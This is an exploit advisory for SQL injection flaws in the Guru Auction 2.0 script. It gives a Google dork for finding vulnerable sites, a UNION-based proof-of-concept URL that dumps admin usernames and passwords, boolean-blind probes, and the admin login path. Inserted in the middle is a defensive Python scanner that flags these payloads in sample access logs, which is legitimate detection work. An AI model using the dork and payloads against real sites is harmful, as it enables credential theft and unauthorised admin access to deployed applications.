Guru Auction 2.0 Multiple SQL Injection Vulnerabilities

Author : v3n0m
Application : Guru Auction 2.0
Price : $490
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=

SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--

Blind SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
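As an added detection example (not part of the advisory and not the vendor's code): a small Python scanner run over constructed Apache-style access-log lines, flagging requests where the two parameters named above (cate_id on subcat.php, item_id on detail.php), which are integer IDs in legitimate use, carry UNION or boolean-blind SQL. The log format, IPs and response sizes are assumptions made up for the sample.

```python
import re
from typing import Optional
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /shop/subcat.php?cate_id=12 HTTP/1.1" 200 5123
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /shop/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin-- HTTP/1.1" 200 3311
203.0.113.9 - - [10/Oct/2023:13:57:14 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 8723
203.0.113.9 - - [10/Oct/2023:13:57:15 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 HTTP/1.1" 200 812
198.51.100.2 - - [10/Oct/2023:13:58:40 +0000] "GET /shop/detail.php?item_id=575 HTTP/1.1" 200 8723
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# Scripts and parameters the advisory names; both are plain integer IDs in normal use.
NUMERIC_PARAMS = {"subcat.php": ("cate_id",), "detail.php": ("item_id",)}
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I)
BLIND_RE = re.compile(r"\b(?:and|or)\b.*\b(?:substring|mid|ascii|sleep|benchmark)\s*\(", re.I)

def classify(value: str) -> Optional[str]:
    """Label one decoded parameter value, or return None if it is a plain integer."""
    if UNION_RE.search(value):
        return "union-based"
    if BLIND_RE.search(value):
        return "boolean-blind"
    if not re.fullmatch(r"-?\d+", value.strip()):
        return "non-numeric id"
    return None

def scan_log(text: str) -> list:
    """Return one finding per suspicious numeric-ID parameter seen in the log."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlparse(m["target"])
        script = url.path.rsplit("/", 1)[-1]
        # parse_qs decodes '+' and %xx, so the regexes see the SQL as the server did.
        params = parse_qs(url.query, keep_blank_values=True)
        for name in NUMERIC_PARAMS.get(script, ()):
            for value in params.get(name, []):
                kind = classify(value)
                if kind:
                    findings.append({"ip": m["ip"], "script": script, "param": name, "kind": kind, "size": m["size"]})
    return findings
```

The paired blind requests also show the tell-tale response-size difference (8723 vs 812 bytes) between a true and a false condition, which is worth alerting on in its own right.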

Admin login entry:
~~~~~~~~~~
http://domain.tld/[path]/admin/